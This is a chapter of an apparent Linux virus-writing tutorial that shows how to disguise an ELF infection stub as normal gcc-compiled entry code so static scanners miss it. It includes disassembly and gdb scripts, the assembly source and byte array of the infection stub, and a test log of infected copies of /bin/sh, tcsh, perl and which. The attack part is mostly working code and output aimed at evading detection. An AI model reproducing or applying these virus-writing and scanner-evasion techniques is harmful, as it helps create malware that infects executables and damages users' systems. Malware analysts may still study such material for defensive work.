11. The stub revisited

 

A person who is more than casually interested in computers should be well schooled in machine language, since it is a fundamental part of a computer.

 Donald Knuth

The scanners in Turn the pages and Second scan check program layout for deviations. On a typical Linux distribution this yields good results since all programs are compiled and linked with the same set of tools. But there are legitimate reasons for executables to look different. Some rescue tools and non-free executables are linked statically to be independent of the target system. And then there is asmutils on http://linuxassembly.org/

asmutils is a set of miscellaneous utilities written in assembly language, targeted on embedded systems and small distributions (e.g. installation or rescue disks); also it contains a small libc and a crypto library. It features the smallest possible size and memory requirements, the fastest speed, and offers fairly good functionality.

The next best approach is to follow the flow of control and verify visited code, starting from the entry point. Again this relies on a certain homogeneity of executables.

  1. A very simple check is alignment. We handle that here and here. gcc(1) never starts functions on odd addresses. But neither VIT nor RST seem to care and put the infection after the last byte of the code segment.

  2. The improved versions of patchEntryAddr in The entry point do a primitive check of the call to __libc_start_main. Since we leave the entry point unmodified we pass this test.

  3. The next step is to check entry code of functions called by __libc_start_main, especially main. We are vulnerable to this.

11.1. Disassembly

patchEntryAddr 3.0 patches the call of __libc_start_main to invoke our virus code instead of main. To stay undetected our code should mimic the real thing. The disassembly of our first program shows everything we need to know. But then that listing was retrieved through heavy cheating.

To disassembly the main of a regular executable we extend the exercise of Disassemble it again, Sam. The script performs no kind of error checking. Feeding anything else than executables built by gcc(1) can have strange effects (like no output at all). There is also no limit on output length. In the examples below the Makefile building this document used head(1).

Command: src/stub_revisited/ndisasm.sh
#!/bin/sh
file=${1:-/bin/bash}
entry_point=$( od -j24 -An -td4 -N4 ${file} )

# 134512640 = 0x8048000
# 24 = offset to address of main in code of _start
main_point_ofs=$( expr ${entry_point} - 134512640 + 24 )
main=$( od -j${main_point_ofs} -An -td4 -N4 ${file} )
main_ofs=$( expr ${main} - 134512640 )

ndisasm -e ${main_ofs} -o ${main} -U ${file}

First a simple test. Compare with above mentioned disassembly.

Output: out/i386/stub_revisited/magic_elf.ndisasm
08048460  55                push ebp
08048461  89E5              mov ebp,esp
08048463  83EC0C            sub esp,byte +0xc
08048466  6A03              push byte +0x3
08048468  6801800408        push dword 0x8048001
0804846D  6A01              push byte +0x1
0804846F  E8A4FEFFFF        call 0x8048318
08048474  31C0              xor eax,eax
08048476  89EC              mov esp,ebp
08048478  5D                pop ebp

A look at tmp/doing_it_in_c/three/sh_infected.

Output: out/i386/stub_revisited/sh_infected.ndisasm
080C1280  6880940508        push dword 0x8059480
080C1285  9C                pushf
080C1286  60                pusha
080C1287  E804000000        call 0x80c1290
080C128C  61                popa
080C128D  9D                popf
080C128E  C3                ret
080C128F  90                nop
080C1290  55                push ebp
080C1291  89E5              mov ebp,esp

And this is plain /bin/bash.

Output: out/i386/stub_revisited/sh.ndisasm
08059480  55                push ebp
08059481  89E5              mov ebp,esp
08059483  57                push edi
08059484  56                push esi
08059485  53                push ebx
08059486  83EC24            sub esp,byte +0x24
08059489  6A01              push byte +0x1
0805948B  68E0BA0C08        push dword 0x80cbae0
08059490  E8A3F9FFFF        call 0x8058e38
08059495  83C410            add esp,byte +0x10

The first two instructions, making up three bytes, are constant. They are followed by an optional series of push to save special registers. Then comes a sub esp to reserve space for local variables. This also seems to be constant. Trivial In the language of mortals does not use local variables and still ends up with a sub.

For the exit code of /bin/bash we need a better filter.

Command: src/stub_revisited/ndisasm_ret.sh
#!/bin/sh
( src/stub_revisited/ndisasm.sh "$@" 2>&1 ) \
| sed -e '/ret/q' \
| tail

Output: out/i386/stub_revisited/sh_ret.ndisasm
08059B2C  A12CB70C08        mov eax,[0x80cb72c]
08059B31  83EC0C            sub esp,byte +0xc
08059B34  50                push eax
08059B35  E826030000        call 0x8059e60
08059B3A  8D65F4            lea esp,[ebp-0xc]
08059B3D  5B                pop ebx
08059B3E  5E                pop esi
08059B3F  5F                pop edi
08059B40  5D                pop ebp
08059B41  C3                ret

I call this weird. It seems that 0xc byte are reserved on the stack just to stay unused. And why does one program use leave and the other pop ebp? A quote from section A.94 of the documentation of nasm:

LEAVE                         ; C9                   [186]

LEAVE destroys a stack frame of the form created by the ENTER instruction (see section A.27). It is functionally equivalent to MOV ESP,EBP followed by POP EBP.

I guess that we are safe on that front. It's easy to check the existence of fixed byte values at a certain location (the entry code). But I doubt whether a static scanner could really realize whether a given exit code is just a dummy. Or what instruction a ret effectively jumps to.

11.2. Stack dump

Let's examine the stack of In the language of mortals just after the sub was executed. Note that you don't have to quote character "$" in interactive gdb(1) sessions. Instead of "\$sp" you type plain "$sp" to reference the stack pointer.

Command: src/stub_revisited/stack.sh
#!/bin/sh
file=${1:-tmp/magic_elf/magic_elf}
gdb ${file} -q <<EOT
	break *0x08048466
	run
	backtrace
	printf "esp=%08x ebp=%08x\n", \$esp, \$ebp
	x/3xw \$sp
	x/3xw \$sp + 12
	x/3xw \$sp + 24
	x/3xw \$sp + 36
	x/3xw \$sp + 48
	x/3xw \$sp + 60
	x/3xw \$sp + 72
	x/3xw \$sp + 84
	x/3xw \$sp + 96
	x/3xw \$sp + 108
EOT

Output: out/i386/stub_revisited/stack
(gdb) Breakpoint 1 at 0x8048466
(gdb) Starting program: /home/alba/virus-writing-HOWTO/tmp/magic_elf/magic_elf 

Breakpoint 1, 0x08048466 in main ()
(gdb) #0  0x08048466 in main ()
#1  0x4003e316 in __libc_start_main (main=0x8048460 <main>, argc=1, 
    ubp_av=0xbffff9c4, init=0x80482e0 <_init>, fini=0x80484c0 <_fini>, 
    rtld_fini=0x4000d2fc <_dl_fini>, stack_end=0xbffff9bc)
    at ../sysdeps/generic/libc-start.c:129
(gdb) esp=bffff94c ebp=bffff958
(gdb) 0xbffff94c:	0x08048441	0x080494f8	0x080495f8
(gdb) 0xbffff958:	0xbffff998	0x4003e316	0x00000001
(gdb) 0xbffff964:	0xbffff9c4	0xbffff9cc	0x080482f6
(gdb) 0xbffff970:	0x080484c0	0x00000000	0xbffff998
(gdb) 0xbffff97c:	0x4003e302	0x00000000	0xbffff9cc
(gdb) 0xbffff988:	0x40151240	0x40015898	0x00000001
(gdb) 0xbffff994:	0x08048360	0x00000000	0x08048381
(gdb) 0xbffff9a0:	0x08048460	0x00000001	0xbffff9c4
(gdb) 0xbffff9ac:	0x080482e0	0x080484c0	0x4000d2fc
(gdb) 0xbffff9b8:	0xbffff9bc	0x40015eec	0x00000001
(gdb) 

The program was stopped at address 0x8048466 in function main, which was called from __libc_start_main. We already encountered file ../sysdeps/generic/libc-start.c in Use the Source, Luke. For sheer curiosity a look at line 129:

Command: src/stub_revisited/get_libc_start_main.sh
#!/bin/sh
output=${1:-src/stub_revisited/__libc_start_main}
stack=${2:-out/i386/stub_revisited/stack}

base_dir=$(
  find /usr/src/redhat/SOURCES -maxdepth 1 -type d -name 'glibc-*'
)

# If the file is not in the place I'm used to on my machine
# we fall back to the copy shipped with this document.
# Forcing my usage of SRPMs gains nothing.
[ -d "${base_dir}" ] || exit 0

sed -n -e 's/:/ /g' -e 's/^ *at *//p' < ${stack} \
| ( read original_filename line_number

  filename="${base_dir}/${original_filename#../}"
  [ -e ${filename} ] || exit 0

  start=$( expr ${line_number} - 8 )
  end=$( expr ${line_number} + 4 )

  ( echo "# ${filename}"
    echo ""
    nl -ba -p ${filename} | sed -n -e "${start},${end} p"
  ) > ${output}
)

Command: src/stub_revisited/__libc_start_main
# /usr/src/redhat/SOURCES/glibc-2.2.4/sysdeps/generic/libc-start.c

   121	  if (init)
   122	    (*init) ();
   123	
   124	#ifdef SHARED
   125	  if (__builtin_expect (_dl_debug_mask & DL_DEBUG_IMPCALLS, 0))
   126	    _dl_debug_printf ("\ntransferring control: %s\n\n", argv[0]);
   127	#endif
   128	
   129	  exit ((*main) (argc, argv, __environ));
   130	}

Makes sense to me.

AddressContents
esp + 16 = ebp + 4return address
esp + 12 = ebp + 0saved ebp

11.3. Implementation

Source: src/stub_revisited/infection.asm
		BITS 32

		push	ebp
		mov	ebp,esp
		sub	esp,byte 0xc
		call	wrapper
		leave
		ret

		align	4
wrapper:	mov	eax,dword 0
		xchg	eax,[ebp]
		sub	ebp,byte 4
		mov	[ebp],eax

		align 16
core:

Source: out/i386/stub_revisited/infection.inc
const unsigned char Target::infection[]
__attribute__ (( aligned(16), section(".text") )) =
{
  0x55,                          /* 00000000: push ebp             */
  0x89,0xE5,                     /* 00000001: mov ebp,esp          */
  0x83,0xEC,0x0C,                /* 00000003: sub esp,byte +0xc    */
  0xE8,0x05,0x00,0x00,0x00,      /* 00000006: call 0x10            */
  0xC9,                          /* 0000000B: leave                */
  0xC3,                          /* 0000000C: ret                  */
  0x90,                          /* 0000000D: nop                  */
  0x90,                          /* 0000000E: nop                  */
  0x90,                          /* 0000000F: nop                  */
  0xB8,0x00,0x00,0x00,0x00,      /* 00000010: mov eax,0x0          */
  0x87,0x45,0x00,                /* 00000015: xchg eax,[ebp+0x0]   */
  0x83,0xED,0x04,                /* 00000018: sub ebp,byte +0x4    */
  0x89,0x45,0x00,                /* 0000001B: mov [ebp+0x0],eax    */
  0x90,                          /* 0000001E: nop                  */
  0x90                           /* 0000001F: nop                  */
};

Source: src/stub_revisited/entry_point_ofs.inc
enum { ENTRY_POINT_OFS = 0x11 };

11.4. Test run

Output: out/i386/stub_revisited/three/cc
Infecting copy of /bin/tcsh... wrote 192 bytes, Ok
Infecting copy of /usr/bin/perl... wrote 192 bytes, Ok
Infecting copy of /usr/bin/which... wrote 192 bytes, Ok
Infecting copy of /bin/sh... wrote 192 bytes, Ok

Output: out/i386/stub_revisited/test
ELF is dead baby, ELF is dead.
/home/alba/virus-writing-HOWTO/tmp/stub_revisited/three/sh_infected
2.05.8(1)-release
/usr/bin/which
ELF is dead baby, ELF is dead.
/usr/bin/which
ELF is dead baby, ELF is dead.
tcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELF is dead baby, ELF is dead.


ELF is dead baby, ELF is dead.
GNU bash, version 2.05.8(1)-release (i386-redhat-linux-gnu)
Copyright 2000 Free Software Foundation, Inc.